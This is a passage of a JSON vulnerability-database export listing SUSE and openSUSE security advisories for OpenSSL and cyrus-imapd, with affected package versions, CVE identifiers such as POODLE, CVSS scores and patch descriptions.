"packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel-32bit", "packageFilename": "libopenssl-devel-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debuginfo", "packageFilename": "openssl-debuginfo-1.0.1j-11.56.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0", "packageFilename": "libopenssl1_0_0-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl", "packageFilename": "openssl-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl1_0_0-debuginfo-32bit", "packageFilename": "libopenssl1_0_0-debuginfo-32bit-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-debuginfo", "packageFilename": "libopenssl1_0_0-debuginfo-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1j-1.68.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-doc", "packageFilename": "openssl-doc-1.0.1j-11.56.1.noarch.rpm", "arch": "noarch", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "13.1", "packageVersion": "1.0.1j-11.56.1", "packageName": "openssl-debugsource", "packageFilename": "openssl-debugsource-1.0.1j-11.56.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "12.3", "packageVersion": "1.0.1j-1.68.1", "packageName": "libopenssl-devel", "packageFilename": "libopenssl-devel-1.0.1j-1.68.1.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The following issues were fixed in this release:\n\n CVE-2014-3566: SSLv3 POODLE attack (bnc#901223) CVE-2014-3513,\n CVE-2014-3567: DTLS memory leak and session ticket memory leak\n\n", "edition": 1, "reporter": "Suse", "published": "2014-10-29T16:05:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "title": "update for openssl (important)", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-10-29T16:05:00", "id": "OPENSUSE-SU-2014:1331-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00008.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:39", "references": ["https://bugzilla.suse.com/954201", "https://bugzilla.suse.com/954200", "https://bugzilla.suse.com/981670", "https://bugzilla.suse.com/860611", "https://bugzilla.suse.com/901748"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "cyrus-imapd-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "cyrus-imapd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "cyrus-imapd-devel-2.3.11-60.65.67.1.ia64.rpm", "packageName": "cyrus-imapd-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "cyrus-imapd-debugsource-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "cyrus-imapd-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "cyrus-imapd-debugsource-2.3.11-60.65.67.1.i586.rpm", "packageName": "cyrus-imapd-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.i586.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.i586.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "cyrus-imapd-2.3.11-60.65.67.1.i586.rpm", "packageName": "cyrus-imapd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.s390x.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.i586.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "cyrus-imapd-debugsource-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "cyrus-imapd-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "cyrus-imapd-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "cyrus-imapd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "cyrus-imapd-debuginfo-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "cyrus-imapd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.ia64.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.i586.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "cyrus-imapd-debugsource-2.3.11-60.65.67.1.ia64.rpm", "packageName": "cyrus-imapd-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "cyrus-imapd-debugsource-2.3.11-60.65.67.1.s390x.rpm", "packageName": "cyrus-imapd-debugsource", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "cyrus-imapd-2.3.11-60.65.67.1.ia64.rpm", "packageName": "cyrus-imapd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "cyrus-imapd-devel-2.3.11-60.65.67.1.s390x.rpm", "packageName": "cyrus-imapd-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "cyrus-imapd-debuginfo-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "cyrus-imapd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.s390x.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "cyrus-imapd-devel-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "cyrus-imapd-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "perl-Cyrus-IMAP-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "perl-Cyrus-IMAP", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ppc64", "packageFilename": "cyrus-imapd-devel-2.3.11-60.65.67.1.ppc64.rpm", "packageName": "cyrus-imapd-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "cyrus-imapd-2.3.11-60.65.67.1.s390x.rpm", "packageName": "cyrus-imapd", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "s390x", "packageFilename": "cyrus-imapd-debuginfo-2.3.11-60.65.67.1.s390x.rpm", "packageName": "cyrus-imapd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "cyrus-imapd-debuginfo-2.3.11-60.65.67.1.ia64.rpm", "packageName": "cyrus-imapd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Debuginfo", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "cyrus-imapd-debuginfo-2.3.11-60.65.67.1.i586.rpm", "packageName": "cyrus-imapd-debuginfo", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "x86_64", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.x86_64.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "ia64", "packageFilename": "perl-Cyrus-SIEVE-managesieve-2.3.11-60.65.67.1.ia64.rpm", "packageName": "perl-Cyrus-SIEVE-managesieve", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.4", "packageVersion": "2.3.11-60.65.67.1", "arch": "i586", "packageFilename": "cyrus-imapd-devel-2.3.11-60.65.67.1.i586.rpm", "packageName": "cyrus-imapd-devel", "operator": "lt"}], "edition": 1, "description": "This update for cyrus-imapd fixes the following issues:\n\n - Previous versions of cyrus-imapd would not allow its users to disable\n old SSL variants that are vulnerable to attacks like BEAST and POODLE.\n This patch adds the configuration option 'tls_versions' to remedy that\n issue. Note that users who upgrade an existing installation will *not*\n have their imapd.conf file overwritten, i.e. their IMAP server will\n continue to support SSLv2 and SSLv3 like before. To disable support for\n those protocols, edit imapd.conf manually to include "tls_versions:\n tls1_0 tls1_1 tls1_2". New installations, however, will have an\n imapd.conf file that contains these settings already, i.e. newly\n installed IMAP servers do *not* support unsafe versions of SSL unless\n that support is explicitly enabled by the user. (bsc#901748)\n\n - An integer overflow vulnerability in cyrus-imapd's urlfetch range\n checking code was fixed. (CVE-2015-8076, CVE-2015-8077, CVE-2015-8078,\n bsc#981670, bsc#954200, bsc#954201)\n\n - Support for Elliptic Curve Diffie\u00c3\u00a2\u00c2\u0080\u00c2\u0093Hellman (ECDH) has been added to\n cyrus-imapd. (bsc#860611)\n\n", "reporter": "Suse", "published": "2016-06-01T12:07:51", "title": "Security update for cyrus-imapd (important)", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2015-8078", "CVE-2015-8077", "CVE-2015-8076"], "modified": "2016-06-01T12:07:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00000.html", "id": "SUSE-SU-2016:1459-1", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:50:20", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=842997f20dc51405dbd07abdc8071460", "https://bugzilla.suse.com/show_bug.cgi?id=892403", "https://bugzilla.suse.com/show_bug.cgi?id=901277", "http://download.suse.com/patch/finder/?keywords=8b3e46d68e087bc1f9f9870abd2b6d0d"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-doc-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-doc-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl-doc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.i586.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-hmac-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8-hmac", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-hmac-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-hmac-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl0_9_8-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl0_9_8", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "openssl-0.9.8j-0.66.1.s390x.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "i586", "packageFilename": "openssl-0.9.8j-0.66.1.i586.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.2", "packageVersion": "0.9.8j-0.66.1", "arch": "s390x", "packageFilename": "libopenssl0_9_8-32bit-0.9.8j-0.66.1.s390x.rpm", "packageName": "libopenssl0_9_8-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "libopenssl-devel-0.9.8j-0.66.1.x86_64.rpm", "packageName": "libopenssl-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server LTSS", "OSVersion": "11.1", "packageVersion": "0.9.8j-0.66.1", "arch": "x86_64", "packageFilename": "openssl-doc-0.9.8j-0.66.1.x86_64.rpm", "packageName": "openssl-doc", "operator": "lt"}], "description": "This OpenSSL update fixes the following issues:\n\n * Session Ticket Memory Leak (CVE-2014-3567)\n * Build option no-ssl3 is incomplete ((CVE-2014-3568)\n * Add support for TLS_FALLBACK_SCSV to mitigate CVE-2014-3566 (POODLE)\n\n Security Issues:\n\n * CVE-2014-3513\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513</a>>\n * CVE-2014-3567\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567</a>>\n * CVE-2014-3566\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566</a>>\n * CVE-2014-3568\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3568</a>>\n", "edition": 1, "reporter": "Suse", "published": "2014-11-11T00:05:06", "title": "Security update for OpenSSL (important)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2014-3513", "CVE-2014-3567", "CVE-2014-3568"], "modified": "2014-11-11T00:05:06", "id": "SUSE-SU-2014:1386-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-11/msg00006.html", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:54", "references": ["https://bugzilla.suse.com/show_bug.cgi?id=901223", "http://download.suse.com/patch/finder/?keywords=b73f6fe02c4bdbb47052a845f36d3df3", "https://bugzilla.suse.com/show_bug.cgi?id=901277"], "affectedPackage": [{"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0-32bit", "packageFilename": "libopenssl1_0_0-32bit-1.0.1g-0.22.1.ppc64.rpm", "arch": "ppc64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1-devel", "packageFilename": "libopenssl1-devel-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1-doc", "packageFilename": "openssl1-doc-1.0.1g-0.22.1.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "openssl1", "packageFilename": "openssl1-1.0.1g-0.22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Security Module", "OSVersion": "11.3", "packageVersion": "1.0.1g-0.22.1", "packageName": "libopenssl1_0_0", "packageFilename": 